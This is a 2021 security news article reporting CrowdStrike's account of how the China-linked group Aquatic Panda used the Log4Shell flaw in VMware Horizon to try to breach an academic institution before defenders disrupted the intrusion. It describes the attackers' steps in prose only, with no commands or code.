30 December 2021

China-based cyber spies breached an academic institution through Log4j flaw


China-based cyber spies breached an academic institution through Log4j flaw

China-linked cyber-espionage group known as Aquatic Panda has been recently spotted exploiting the Log4Shell vulnerability to break into a large academic institution.

According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) in order to gain access to the instance of VMware Horizon that employed the vulnerable Log4j library at an unnamed academic institution.

The purpose of the attack is unknown because the intrusion was thwarted.

“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.

The threat actor performed connectivity checks via DNS lookups for a subdomain executed under the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on a Windows host under the Apache Tomcat service to retrieve additional tools hosted on remote infrastructure.

Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.

The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used winRAR to compress the memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\temp\ directories to cover their tracks.

“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.


Back to the list

Latest Posts

The story of the four bears: Brief analysis of APT groups linked to the Russian government

The story of the four bears: Brief analysis of APT groups linked to the Russian government

In “The Four Bears” series we will tell you about the APT groups known as Fancy Bear, Cozy Bear, Voodoo Bear, and Berserk Bear.
17 January 2022
Cybersecurity year in review: Most notable APT hacks of 2021

Cybersecurity year in review: Most notable APT hacks of 2021

In 2021 nation-state actors somewhat faded into the background, but they still pose a significant threat.
17 January 2022
Hackers put up for sale data of 2M ONUS customers after the company refused to pay $5 million ransom

Hackers put up for sale data of 2M ONUS customers after the company refused to pay $5 million ransom

The attackers exploited the Log4Shell vulnerability on ONUS’ Cyclos server to plant backdoor and exfiltrate data.
30 December 2021